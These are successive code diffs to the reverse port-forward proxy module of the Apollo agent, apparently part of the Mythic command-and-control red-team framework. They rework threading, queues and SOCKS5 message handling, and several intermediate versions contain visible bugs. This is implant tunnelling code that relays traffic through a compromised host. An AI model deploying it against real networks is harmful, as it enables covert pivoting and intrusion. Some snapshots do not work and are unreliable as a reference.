-                            target = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
-                        else
-                            target = new Socket(AddressFamily.InterNetworkV6, SocketType.Stream, ProtocolType.Tcp);
-                    }
-                    catch (Exception ex)
-                    {
-                        throw new SocksException("Failed to create socket for address.", SocksError.ConnectionRefused);
-                    }
-                    //target.Bind(localEndpoint);
-
-                    //TcpClient target = new TcpClient(localEndpoint);
-                    try
-                    {
-                        target.Connect(request.DestAddr.IP.ToString(), request.DestAddr.Port);
-                    }
-                    catch (Exception ex)
-                    {
-                        throw new SocksException($"Failed on client connect to {request.DestAddr.IP.ToString()}", SocksError.HostUnreachable, ex);
-                    }
-                    bRet = true;
-                    //DebugWriteLine($"Successfully connected to {request.DestAddr.IP.ToString()}");
-                    ClientConnection = target;
-                    Bind = bind;
-                    //var msgToSend = CreateFormattedMessageWithLength(SocksError.SuccessReply, bind, conn);
-                    //AddMythicMessageToQueue(msgToSend);
-                    //new Thread(() => conn.StartRelay()).Start();
-                    break;
-                default:
-                    throw new SocksException($"Command not supported: {request.Command}", SocksError.CommandNotSupported);
-            }
-            return bRet;
-        }
-
-
-        public bool EnqueueRequestData(byte[] data)
-        {
-            //DebugWriteLine($"{IPAddress} ({ServerID}) attempting to enqueue request data...");
-            syncRequestData.Enqueue(data);
-            //DebugWriteLine($"{IPAddress} ({ServerID}) request data successfully enqueued!");
-            return true;
-        }
-
-        public byte[] GetRequestData()
-        {
-            byte[] data;
-            while (!exited)
-            {
-                if (syncRequestData.Count > 0)
-                {
-                    data = (byte[])syncRequestData.Dequeue();
-                    return data;
-                }
-            }
-            return null;
-        }
-
-        public void Close()
-        {
-            // Something called close twice, so let's just wait for the other thread to finish.
-            if (exited)
-                exitEvent.WaitOne();
-            // Initialize close sequence
-            else
-            {
-                exited = true;
-                //if (ReadThread != null && WriteThread != null)
-                //{
-                //    if (ReadThread.IsAlive || WriteThread.IsAlive)
-                //    {
-                //        ReadThread.Join();
-                //        WriteThread.Join();
-                //    }
-                //}
-                // Kill the socket.
-                if (ClientConnection != null)
-                {
-                    try
-                    {
-                        ClientConnection.Close();
-                    }
-                    catch (Exception ex)
-                    {
-                        //DebugWriteLine($"Error closing socket to {IPAddress}: {ex.Message}");
-                    }
-                }
-                // Remove everything.
-                OnDisconnect(this.ServerID);
-                // Notify other callers you can terminate.
-                exitEvent.Set();
-            }
-        }
-
-        public bool EnqueueResponseData(byte[] data)
-        {
-            //DebugWriteLine($"{IPAddress} ({ServerID}) attempting to enqueue response data...");
-            syncResponseData.Enqueue(data);
-            //DebugWriteLine($"{IPAddress} ({ServerID}) response data successfully enqueued!");
-            return true;
-        }
-
-
+       
     }
 }

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
@@ -82,6 +82,7 @@ namespace Apollo.RPortFwdProxy.Classes
             RemoteIp = rport;
 
             operatorDispatchDatagram = new Thread(() => DispatchToOperators());
+            operatorDispatchDatagram.Start();
         }
 
         public string GetConfs()
@@ -119,6 +120,7 @@ namespace Apollo.RPortFwdProxy.Classes
                     operatorMapConn[entry.Key] = new_operatorconn;
                     Thread thread = new Thread(() => ReadFromTarget(entry.Key));
                     operatorReadQueue[entry.Key] = thread;
+                    operatorReadQueue[entry.Key].Start();
                 }
 
                 if (entry.Value.Count > 0)

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
@@ -36,7 +36,7 @@ namespace Apollo.RPortFwdProxy.Classes
 
         //public Dictionary<String,Dictionary<String,Dictionary<String,List<String>>>> messages_back = new Dictionary<String,Dictionary<String,Dictionary<String,List<String>>>>();
         public Dictionary<string, Thread> operatorReadQueue = new Dictionary<string, Thread>();
-        public Dictionary<string, Queue> operatorMapQueue = new Dictionary<string, Queue>();
+        public Dictionary<string, Queue<String>> operatorMapQueue = new Dictionary<string, Queue<String>>();
         public Dictionary<string, Socket> operatorMapConn = new Dictionary<string, Socket>();
         public Dictionary<String, List<String>> messages_back = new Dictionary<String, List<String>>();
 
@@ -92,7 +92,7 @@ namespace Apollo.RPortFwdProxy.Classes
 
         public void StopForward()
         {
-            foreach (KeyValuePair<string, Queue> entry in operatorMapQueue)
+            foreach (KeyValuePair<string, Queue<String>> entry in operatorMapQueue)
             {
                 operatorDispatchDatagram.Abort();
                 lock (operatorReadQueue)
@@ -113,7 +113,7 @@ namespace Apollo.RPortFwdProxy.Classes
         private void DispatchToOperators()
         {
 
-            foreach (KeyValuePair<string, Queue> entry in operatorMapQueue)
+            foreach (KeyValuePair<string, Queue<String>> entry in operatorMapQueue)
             {
                 if (operatorMapConn.ContainsKey(entry.Key) == false)
                 {
@@ -155,6 +155,9 @@ namespace Apollo.RPortFwdProxy.Classes
                             {
                                 if (operatorMapQueue[entry.Key] == null){
                                     operatorMapQueue[entry.Key] = new Queue();
+                                }
+                                if (!operatorMapQueu.ContainsKey(entry.Key)){
+                                    operatorMapQueue[entry.Key] = new Queue<String>();
                                 }
                                 operatorMapQueue[entry.Key].Enqueue(base64data);
                             }

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
@@ -153,6 +153,9 @@ namespace Apollo.RPortFwdProxy.Classes
                         {
                             foreach (string base64data in entry.Value)
                             {
+                                if (operatorMapQueue[entry.Key] == null){
+                                    operatorMapQueue[entry.Key] = new Queue();
+                                }
                                 operatorMapQueue[entry.Key].Enqueue(base64data);
                             }
                         }

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
@@ -79,7 +79,7 @@ namespace Apollo.RPortFwdProxy.Classes
         {
             MythicPort = port;
             RemotePort = rport;
-            RemoteIp = rport;
+            RemoteIp = rip;
 
             operatorDispatchDatagram = new Thread(() => DispatchToOperators());
             operatorDispatchDatagram.Start();

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
@@ -116,7 +116,7 @@ namespace Apollo.RPortFwdProxy.Classes
 
                 if (entry.Value.Count > 0)
                 {
-                    lock (operatorMapQueue[entry.Key])
+                    lock (operatorMapQueue)
                     {
                         string base64data = (string)operatorMapQueue[entry.Key].Dequeue();
                         byte[] data = Convert.FromBase64String(base64data);
@@ -139,7 +139,7 @@ namespace Apollo.RPortFwdProxy.Classes
                     foreach(KeyValuePair<String, List<String>> entry in rip_dict.Value)
                     {
                         string operatorId = entry.Key;
-                        lock (operatorMapQueue[entry.Key])
+                        lock (operatorMapQueue)
                         {
                             foreach (string base64data in entry.Value)
                             {

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
@@ -94,6 +94,10 @@ namespace Apollo.RPortFwdProxy.Classes
         {
             foreach (KeyValuePair<string, Queue> entry in operatorMapQueue)
             {
+                lock (operatorReadQueue)
+                {
+                    operatorReadQueue[entry.Key].Abort();
+                }
                 lock (operatorMapConn)
                 {
                     operatorMapConn[entry.Key].Close();
@@ -101,10 +105,6 @@ namespace Apollo.RPortFwdProxy.Classes
                 lock (operatorMapQueue)
                 {
                     operatorMapQueue[entry.Key].Clear();
-                }
-                lock (operatorReadQueue)
-                {
-                    operatorReadQueue[entry.Key].Clear();
                 }
             }
         }

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/Classes/ProxyConnection.cs
@@ -156,7 +156,7 @@ namespace Apollo.RPortFwdProxy.Classes
                                 if (operatorMapQueue[entry.Key] == null){
                                     operatorMapQueue[entry.Key] = new Queue();
                                 }
-                                if (!operatorMapQueu.ContainsKey(entry.Key)){
+                                if (!operatorMapQueue.ContainsKey(entry.Key)){
                                     operatorMapQueue[entry.Key] = new Queue<String>();
                                 }
                                 operatorMapQueue[entry.Key].Enqueue(base64data);

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
@@ -27,43 +27,7 @@ using Utils.ErrorUtils;
 
 namespace Apollo.RPortFwdProxy
 {
-    namespace Structs
-    {
-        public struct AuthContext
-        {
-            public int Method;
-            public Dictionary<string, string> Payload;
-        }
-
-        public struct AddrSpec
-        {
-            public string FQDN;
-            public IPAddress IP;
-            public int Port;
-        }
-
-        public struct Request
-        {
-            public int Version;
-            public int Command;
-            public AuthContext AuthContext;
-            public AddrSpec RemoteAddr;
-            public AddrSpec DestAddr;
-            //public ProxyConnection BufCon; // not right - needs revision
-        }
-    }
-    namespace Enums
-    {
-
-        internal enum AddressType : uint
-        {
-            IPv4Address = 1,
-            FQDNAddress = 3,
-            IPV6Address = 4
-        }
-    }
-
-
+    
     static class RPortFwdController
     {
 
@@ -71,60 +35,50 @@ namespace Apollo.RPortFwdProxy
         {
             if (proxyConnectionMap.ContainsKey(port))
             {
-                return false;
+                return true;
             }
-            return true;
+            return false;
         }
 
         public static bool is_dispatcher_active = false;
-        public static bool is_retriever_active = false;
-
 
         public static Thread dispatcher;
 
         public static Dictionary<string, ProxyConnection> proxyConnectionMap = new Dictionary<string, ProxyConnection>();
 
-        public static Queue<PortFwdDatagram> messageQueue = new Queue<PortFwdDatagram>();
-        public static Queue messageQueueSendBack = new Queue();
+	public static Queue<PortFwdDatagram> messageQueue = new Queue<PortFwdDatagram>();
+        public static Queue<String> messageQueueSendBack = new Queue<String>();
 
         private static bool exited = false;
-
-        private static Queue sendToMythicQueue = new Queue();
-        private static Queue syncSendToMythicQueue = Queue.Synchronized(sendToMythicQueue);
-
-        private static Queue mythicServerDatagramQueue = new Queue();
-        private static Queue syncMythicServerDatagramQueue = Queue.Synchronized(mythicServerDatagramQueue);
-
-        public static Random rnd = new Random();
-        public static string CONN_HOST = "mythic";
-        public static int CONN_PORT = 3334;
-        public static string CONN_TYPE = "tcp";
-        public static int MESSAGE_SIZE = 512000;
-        public static int MAX_MESSAGES = 500;
-        public static int CONN_RECONNECT = 1000; // ms
-        public static byte[] DisconnectMessageBytes = BitConverter.GetBytes(-1);
-
-        public const int ConnectCommand = 1;
-        public const int NoAuth = 0;
-        public const int socks5Version = 5;
-        public static IPAddress localhostIPAddr { get; } = IPAddress.Parse("127.0.0.1");
-
-
-        private static Thread ReadFromMythicThread = null;
-        private static Thread WriteToMythicThread = null;
-
-
-        public static Dictionary<string, Dictionary<string, Socket>> connections = new Dictionary<string, Dictionary<string, Socket>>();
 
         public static string ListPortForward()
         {
             string listport = "";
-            foreach (KeyValuePair<string, ProxyConnection> entry in proxyConnectionMap)
+	    foreach (KeyValuePair<string, ProxyConnection> entry in proxyConnectionMap)
             {
-                listport += entry.Value.GetConfs() +"\n"; 
+                    listport += entry.Value.GetConfs() +"\n"; 
             }
             return listport;
         }
+
+        public static bool FlushClient()
+	{
+	    try{
+	        List<string> forwards = null;
+	        lock(proxyConnectionMap){
+  	            forwards = new List<string>(proxyConnectionMap.Keys);	
+                    foreach (string port in forwards){
+		        proxyConnectionMap[port].StopForward();
+                        proxyConnectionMap.Remove(port);
+		    }
+	        }
+	        exited = true;
+	        is_dispatcher_active = false;
+		return true;
+	    }catch(Exception ex){
+                return false;
+	    }
+	}
 
         public static bool StopClientPort(string port)
         {
@@ -140,151 +94,71 @@ namespace Apollo.RPortFwdProxy
                     return true;
                 }catch (Exception ex)
                 {
-                    return false;
+       		    return false;
                 }
             }
             return false;
         }
 
-        private static void ClearAllQueues()
-        {
-            ClearSendToMythicQueue();
-            ClearDatagramQueue();
-        }
-
-
-        private static void ClearDatagramQueue()
-        {
-            syncMythicServerDatagramQueue.Clear();
-            ////DebugWriteLine("Releasing mythicServerDatagramMutex.");
-        }
-
-        private static void ClearSendToMythicQueue()
-        {
-            syncSendToMythicQueue.Clear();
-            ////DebugWriteLine("Releasing sendToMythicQueueMutex.");
-        }
-
+        
         public static void StartClientPort(string port, string rport, string rip)
         {
-            if (is_dispatcher_active == false)
-            {
-                new Thread(() => DispatchDatagram()).Start();
-                is_dispatcher_active = true;
-            }
-
-            //if the dispatcher function thread is not running, start the function
-            //the dispatcher function should keep reading the queue and sending the results
-            //to each ProxyConnection object existent in the dictionary map
-            ProxyConnection conn = new ProxyConnection(port, rport, rip);
-            proxyConnectionMap[port] = conn;
-            // A ProxyConnection object is declared for each port,
-            // this object may have multiple connections for the same port
-
-            // the dispatcher thread will keep sending data
-            // to ProxyConnection object. In case a connection is not already established, create the connection
-
-            // this func will receive a ProxyConnection after successful connection from operator
-            // add this object to dictionary map of portforward
-
-            // RetrieveDatagram will get Data back to mythic
-
-            // DispatchDatagram will read general queue and send data to each proxy connection
-            // start thread to keep adding to general queue messages from that proxyconnection object
+	    try{	
+                if (is_dispatcher_active == false)
+                {
+                    is_dispatcher_active = true;
+		    exited = false;
+		    new Thread(() => DispatchDatagram()).Start();
+                }
+            
+                ProxyConnection conn = new ProxyConnection(port, rport, rip);
+                proxyConnectionMap[port] = conn;
+                
+            
+            }catch{}
         }
 
 
-        // Function responsible for adding messages to send to
-        // the mythic server.
-        public static void AddMythicMessageToQueue(SocksDatagram msg)
-        {
-            syncSendToMythicQueue.Enqueue(msg);
-            ////DebugWriteLine("Releasing sendToMythicQueueMutex.");
-        }
 
         // Function respponsible for fetching messages from
         // the queue so that they may be sent to the Mythic
         // server.
         public static PortFwdDatagram[] GetMythicMessagesFromQueue()
         {
-            PortFwdDatagram[] default_struct;
+            PortFwdDatagram[] default_struct = null;
+	    try{
             //PortFwdDatagram message = new PortFwdDatagram() { s = value, length = value.Length };
-            if (exited == false)
-            {
-                Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>> message = new Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>>();
-
-                foreach (KeyValuePair<string, ProxyConnection> entry in proxyConnectionMap)
+                if (exited == false)
                 {
-                    Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>> specDatagram = entry.Value.GetMessagesBack();
-                    message[entry.Key] = specDatagram;
+
+                    Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>> message = new Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>>();
+                    List<string> forwards = null;
+		    forwards = new List<string>(proxyConnectionMap.Keys);
+		    
+		    foreach (string entry in forwards)
+                    {
+                        Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>> specDatagram = proxyConnectionMap[entry].GetMessagesBack();
+                        message[entry] = specDatagram;
+			
+                    }
+                    default_struct = new PortFwdDatagram[1];
+                    default_struct[0] = new PortFwdDatagram() { data = message };
+		    return default_struct;
                 }
                 default_struct = new PortFwdDatagram[1];
-                default_struct[0] = new PortFwdDatagram() { data = message };
-                return default_struct;
-            }
-            default_struct = new PortFwdDatagram[1];
-            default_struct[0] = new PortFwdDatagram();
+                default_struct[0] = new PortFwdDatagram();
+            }catch{ }
             return default_struct;
         }
 
-        //HERE
+        
         public static void AddDatagramToQueue(PortFwdDatagram dg)
         {
             messageQueue.Enqueue(dg);
         }
 
 
-        private static object[] GetDatagramsFromQueue()
-        {
-            while (!exited)
-            {
-                if (syncMythicServerDatagramQueue.Count > 0)
-                {
-                    lock (syncMythicServerDatagramQueue)
-                    {
-                        var results = syncMythicServerDatagramQueue.ToArray();
-                        syncMythicServerDatagramQueue.Clear();
-                        return results;
-                    }
-                }
-            }
-            return null;
-        }
-
-        public static void SendDisconnect(int serverID)
-        {
-            var msg = new SocksDatagram()
-            {
-                server_id = serverID,
-                data = Convert.ToBase64String(DisconnectMessageBytes)
-            };
-            AddMythicMessageToQueue(msg);
-        }
-
-
-        //public static void AwaitConnectionDisconnect(ProxyConnection conn)
-        //{
-        //    if (conn == null)
-        //        return;
-        //    conn.ExitEvent.WaitOne();
-        //    var msg = new SocksDatagram()
-        //    {
-        //        server_id = conn.ServerID,
-        //        data = Convert.ToBase64String(DisconnectMessageBytes)
-        //    };
-        //    AddMythicMessageToQueue(msg);
-        //}
-
-        //public static void AwaitRemoveConnection(ProxyConnection conn)
-        //{
-        //    if (conn == null)
-        //        return;
-        //    conn.ExitEvent.WaitOne();
-        //    //DebugWriteLine("Attempting to remove proxy!");
-        //    RemoveProxyConnection(conn.ServerID);
-        //}
-
-
+                
         //this function will dispatch each data to each connection in the ProxyConnection Object
         private static void DispatchDatagram()
         {
@@ -292,98 +166,20 @@ namespace Apollo.RPortFwdProxy
             {
                 if (messageQueue.Count > 0)
                 {
-                    lock (messageQueue)
-                    {
-                        PortFwdDatagram curMsg = (PortFwdDatagram)messageQueue.Dequeue();
-                        //iterate over dictionary dg
+		    PortFwdDatagram curMsg = (PortFwdDatagram)messageQueue.Dequeue();
+			//iterate over dictionary dg
                         //for each localport in dictionary, send the rest to the respective to proxyConnectionMap
                         //data will be processed inside ProxyConnection object
-                        foreach(KeyValuePair<string, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>> entry in curMsg.data)
-                        {
-                            if (proxyConnectionMap.ContainsKey(entry.Key))
-                            {
-                                proxyConnectionMap[entry.Key].AddDatagramToQueueProx(entry.Value);
-                            }
-                        }
-                    }
+                    foreach(KeyValuePair<string, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>> entry in curMsg.data)
+                    {
+	                if (proxyConnectionMap.ContainsKey(entry.Key))
+		        {
+                        proxyConnectionMap[entry.Key].AddDatagramToQueueProx(entry.Value);
+		        }
+		    }
                 }
             }
         }
 
-
-
-        public static void SendError(int serverID, SocksError resp = SocksError.HostUnreachable)
-        {
-            byte[] bytesToSend = CreateFormattedMessage(resp, new Structs.AddrSpec() { FQDN = "", IP = null, Port = -1 });
-            var msg = new SocksDatagram()
-            {
-                server_id = serverID,
-                data = Convert.ToBase64String(bytesToSend)
-            };
-            AddMythicMessageToQueue(msg);
-        }
-
-        private static byte[] CreateFormattedMessage(SocksError resp, Structs.AddrSpec addr)
-        {
-            Enums.AddressType addrType;
-            byte[] addrBody;
-            UInt16 addrPort;
-
-            byte[] msg;
-
-
-            if (addr.FQDN == "" && addr.IP == null && addr.Port == -1)
-            {
-                addrType = Enums.AddressType.IPv4Address;
-                addrBody = new byte[4];
-                addrPort = 0;
-                //return DisconnectMessageBytes;
-            }
-            else if (addr.FQDN != "")
-            {
-                addrType = Enums.AddressType.FQDNAddress;
-                addrBody = ASCIIEncoding.ASCII.GetBytes(addr.FQDN);
-                addrPort = (UInt16)addr.Port;
-            }
-            else if (addr.IP != null)
-            {
-                if (addr.IP.AddressFamily == AddressFamily.InterNetwork)
-                {
-                    addrType = Enums.AddressType.IPv4Address;
-                    addrBody = addr.IP.GetAddressBytes();
-                    addrPort = (UInt16)addr.Port;
-                }
-                else if (addr.IP.AddressFamily == AddressFamily.InterNetworkV6)
-                {
-                    addrType = Enums.AddressType.IPV6Address;
-                    addrBody = addr.IP.GetAddressBytes();
-                    addrPort = (UInt16)addr.Port;
-                }
-                else
-                {
-                    //DebugWriteLine($"Failed to format address: {addr.IP.AddressFamily.ToString()}");
-                    return new byte[1];
-                }
-            }
-            else
-            {
-                //DebugWriteLine($"Failed to format address: {addr}");
-                return new byte[1];
-            }
-
-
-            // Format the message
-            msg = new byte[6 + addrBody.Length];
-            msg[0] = socks5Version;
-            msg[1] = BitConverter.GetBytes((uint)resp)[0];
-            msg[2] = 0; // reserved
-            msg[3] = BitConverter.GetBytes((uint)addrType)[0];
-            Array.Copy(addrBody, 0, msg, 4, addrBody.Length);
-            msg[msg.Length - 2] = (byte)(addrPort >> 8);
-            msg[msg.Length - 1] = (byte)(addrPort & 0xff);
-
-            return msg;
-
-        }
     }
 }

--- a/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
+++ b/Payload_Type/Apollo/agent_code/Apollo/RPortFwdProxy/RPortFwdController.cs
@@ -1,0 +1,404 @@
+#undef THREADING
+#define THREADING
+
+using Newtonsoft.Json;
+using System;
+using System.CodeDom.Compiler;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Net;
+using System.Net.Sockets;
+using System.Runtime.InteropServices;
+using System.Text;
+using System.Threading;
+using System.Security.Cryptography.X509Certificates;
+using System.Net.Security;
+using Apollo.RPortFwdProxy.Classes;
+using Mythic.Structs;
+using System.Runtime.Serialization;
+using System.Collections;
+using Apollo.CommandModules;
+using System.Windows.Forms;
+using System.Runtime.Remoting.Contexts;
+using static Utils.DebugUtils;
+using static Utils.ByteUtils;
+using Utils.ErrorUtils;
+
+namespace Apollo.RPortFwdProxy
+{
+    namespace Structs
+    {
+        public struct AuthContext
+        {
+            public int Method;
+            public Dictionary<string, string> Payload;
+        }
+
+        public struct AddrSpec
+        {
+            public string FQDN;
+            public IPAddress IP;
+            public int Port;
+        }
+
+        public struct Request
+        {
+            public int Version;
+            public int Command;
+            public AuthContext AuthContext;
+            public AddrSpec RemoteAddr;
+            public AddrSpec DestAddr;
+            //public ProxyConnection BufCon; // not right - needs revision
+        }
+    }
+    namespace Enums
+    {
+
+        internal enum AddressType : uint
+        {
+            IPv4Address = 1,
+            FQDNAddress = 3,
+            IPV6Address = 4
+        }
+    }
+
+
+    static class RPortFwdController
+    {
+
+        public static bool IsActive(string port)
+        {
+            if (proxyConnectionMap.ContainsKey(port))
+            {
+                return false;
+            }
+            return true;
+        }
+
+        public static bool is_dispatcher_active = false;
+        public static bool is_retriever_active = false;
+
+
+        public static Thread dispatcher;
+
+        public static Dictionary<string, ProxyConnection> proxyConnectionMap = new Dictionary<string, ProxyConnection>();
+
+        public static Queue messageQueue = new Queue();
+        public static Queue messageQueueSendBack = new Queue();
+
+        private static bool exited = true;
+
+        private static Queue sendToMythicQueue = new Queue();
+        private static Queue syncSendToMythicQueue = Queue.Synchronized(sendToMythicQueue);
+
+        private static Queue mythicServerDatagramQueue = new Queue();
+        private static Queue syncMythicServerDatagramQueue = Queue.Synchronized(mythicServerDatagramQueue);
+
+        public static Random rnd = new Random();
+        public static string CONN_HOST = "mythic";
+        public static int CONN_PORT = 3334;
+        public static string CONN_TYPE = "tcp";
+        public static int MESSAGE_SIZE = 512000;
+        public static int MAX_MESSAGES = 500;
+        public static int CONN_RECONNECT = 1000; // ms
+        public static byte[] DisconnectMessageBytes = BitConverter.GetBytes(-1);
+
+        public const int ConnectCommand = 1;
+        public const int NoAuth = 0;
+        public const int socks5Version = 5;
+        public static IPAddress localhostIPAddr { get; } = IPAddress.Parse("127.0.0.1");
+
+
+        private static Thread ReadFromMythicThread = null;
+        private static Thread WriteToMythicThread = null;
+
+
+        public static Dictionary<string, Dictionary<string, Socket>> connections = new Dictionary<string, Dictionary<string, Socket>>();
+
+        public static string ListPortForward()
+        {
+            string listport = "";
+            foreach (KeyValuePair<string, ProxyConnection> entry in proxyConnectionMap)
+            {
+                listport += entry.Value.GetConfs() +"\n"; 
+            }
+            return listport;
+        }
+
+        public static bool StopClientPort(string port)
+        {
+            if (IsActive(port))
+            {
+                try
+                {
+                    lock (proxyConnectionMap)
+                    {
+                        proxyConnectionMap[port].StopForward();
+                        proxyConnectionMap.Remove(port);
+                    }
+                    return true;
+                }catch (Exception ex)
+                {
+                    return false;
+                }
+            }
+            return false;
+        }
+
+        private static void ClearAllQueues()
+        {
+            ClearSendToMythicQueue();
+            ClearDatagramQueue();
+        }
+
+
+        private static void ClearDatagramQueue()
+        {
+            syncMythicServerDatagramQueue.Clear();
+            ////DebugWriteLine("Releasing mythicServerDatagramMutex.");
+        }
+
+        private static void ClearSendToMythicQueue()
+        {
+            syncSendToMythicQueue.Clear();
+            ////DebugWriteLine("Releasing sendToMythicQueueMutex.");
+        }
+
+        public static void StartClientPort(string port, string rport, string rip)
+        {
+            if (is_dispatcher_active == false)
+            {
+                new Thread(() => DispatchDatagram()).Start();
+                is_dispatcher_active = true;
+            }
+
+            //if the dispatcher function thread is not running, start the function
+            //the dispatcher function should keep reading the queue and sending the results
+            //to each ProxyConnection object existent in the dictionary map
+            ProxyConnection conn = new ProxyConnection(port, rport, rip);
+            proxyConnectionMap[port] = conn;
+            // A ProxyConnection object is declared for each port,
+            // this object may have multiple connections for the same port
+
+            // the dispatcher thread will keep sending data
+            // to ProxyConnection object. In case a connection is not already established, create the connection
+
+            // this func will receive a ProxyConnection after successful connection from operator
+            // add this object to dictionary map of portforward
+
+            // RetrieveDatagram will get Data back to mythic
+            if (is_retriever_active == false)
+            {
+                new Thread(() => RetrieveDatagram()).Start();
+                is_retriever_active = true;
+            }
+
+            // DispatchDatagram will read general queue and send data to each proxy connection
+            // start thread to keep adding to general queue messages from that proxyconnection object
+        }
+
+
+        // Function responsible for adding messages to send to
+        // the mythic server.
+        public static void AddMythicMessageToQueue(SocksDatagram msg)
+        {
+            syncSendToMythicQueue.Enqueue(msg);
+            ////DebugWriteLine("Releasing sendToMythicQueueMutex.");
+        }
+
+        // Function respponsible for fetching messages from
+        // the queue so that they may be sent to the Mythic
+        // server.
+        public static PortFwdDatagram[] GetMythicMessagesFromQueue()
+        {
+            PortFwdDatagram[] default_struct;
+            //PortFwdDatagram message = new PortFwdDatagram() { s = value, length = value.Length };
+            if (exited == false)
+            {
+                Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>> message = new Dictionary<String, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>>();
+
+                foreach (KeyValuePair<string, ProxyConnection> entry in proxyConnectionMap)
+                {
+                    Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>> specDatagram = entry.Value.GetMessagesBack();
+                    message[entry.Key] = specDatagram;
+                }
+                default_struct = new PortFwdDatagram[0];
+                default_struct[0] = new PortFwdDatagram() { data = message };
+            }
+            default_struct = new PortFwdDatagram[0];
+            default_struct[0] = new PortFwdDatagram();
+            return default_struct;
+        }
+
+        //HERE
+        public static void AddDatagramToQueue(PortFwdDatagram dg)
+        {
+            messageQueue.Enqueue(dg);
+        }
+
+
+        private static object[] GetDatagramsFromQueue()
+        {
+            while (!exited)
+            {
+                if (syncMythicServerDatagramQueue.Count > 0)
+                {
+                    lock (syncMythicServerDatagramQueue)
+                    {
+                        var results = syncMythicServerDatagramQueue.ToArray();
+                        syncMythicServerDatagramQueue.Clear();
+                        return results;
+                    }
+                }
+            }
+            return null;
+        }
+
+        public static void SendDisconnect(int serverID)
+        {
+            var msg = new SocksDatagram()
+            {
+                server_id = serverID,
+                data = Convert.ToBase64String(DisconnectMessageBytes)
+            };
+            AddMythicMessageToQueue(msg);
+        }
+
+
+        //public static void AwaitConnectionDisconnect(ProxyConnection conn)
+        //{
+        //    if (conn == null)
+        //        return;
+        //    conn.ExitEvent.WaitOne();
+        //    var msg = new SocksDatagram()
+        //    {
+        //        server_id = conn.ServerID,
+        //        data = Convert.ToBase64String(DisconnectMessageBytes)
+        //    };
+        //    AddMythicMessageToQueue(msg);
+        //}
+
+        //public static void AwaitRemoveConnection(ProxyConnection conn)
+        //{
+        //    if (conn == null)
+        //        return;
+        //    conn.ExitEvent.WaitOne();
+        //    //DebugWriteLine("Attempting to remove proxy!");
+        //    RemoveProxyConnection(conn.ServerID);
+        //}
+
+
+        private static void RetrieveDatagram()
+        {
+            while (!exited)
+            {
+                foreach (KeyValuePair<string, ProxyConnection> entry in proxyConnectionMap)
+                {
+                    entry.Value.ReadFromTarget();
+                }
+            }
+        }
+
+        //this function will dispatch each data to each connection in the ProxyConnection Object
+        private static void DispatchDatagram()
+        {
+            while (!exited)
+            {
+                if (messageQueue.Count > 0)
+                {
+                    lock (messageQueue)
+                    {
+                        PortFwdDatagram curMsg = (PortFwdDatagram)messageQueue.Dequeue();
+                        //iterate over dictionary dg
+                        //for each localport in dictionary, send the rest to the respective to proxyConnectionMap
+                        //data will be processed inside ProxyConnection object
+                        foreach(KeyValuePair<string, Dictionary<String, Dictionary<String, Dictionary<String, List<String>>>>> entry in curMsg.data)
+                        {
+                            if (proxyConnectionMap.ContainsKey(entry.Key))
+                            {
+                                proxyConnectionMap[entry.Key].AddDatagramToQueueProx(entry.Value);
+                            }
+                        }
+                    }
+                }
+            }
+        }
+
+
+
+        public static void SendError(int serverID, SocksError resp = SocksError.HostUnreachable)
+        {
+            byte[] bytesToSend = CreateFormattedMessage(resp, new Structs.AddrSpec() { FQDN = "", IP = null, Port = -1 });
+            var msg = new SocksDatagram()
+            {
+                server_id = serverID,
+                data = Convert.ToBase64String(bytesToSend)
+            };
+            AddMythicMessageToQueue(msg);
+        }
+
+        private static byte[] CreateFormattedMessage(SocksError resp, Structs.AddrSpec addr)
+        {
+            Enums.AddressType addrType;
+            byte[] addrBody;
+            UInt16 addrPort;
+
+            byte[] msg;
+
+
+            if (addr.FQDN == "" && addr.IP == null && addr.Port == -1)
+            {
+                addrType = Enums.AddressType.IPv4Address;
+                addrBody = new byte[4];
+                addrPort = 0;
+                //return DisconnectMessageBytes;
+            }
+            else if (addr.FQDN != "")
+            {
+                addrType = Enums.AddressType.FQDNAddress;
+                addrBody = ASCIIEncoding.ASCII.GetBytes(addr.FQDN);
+                addrPort = (UInt16)addr.Port;
+            }
+            else if (addr.IP != null)
+            {
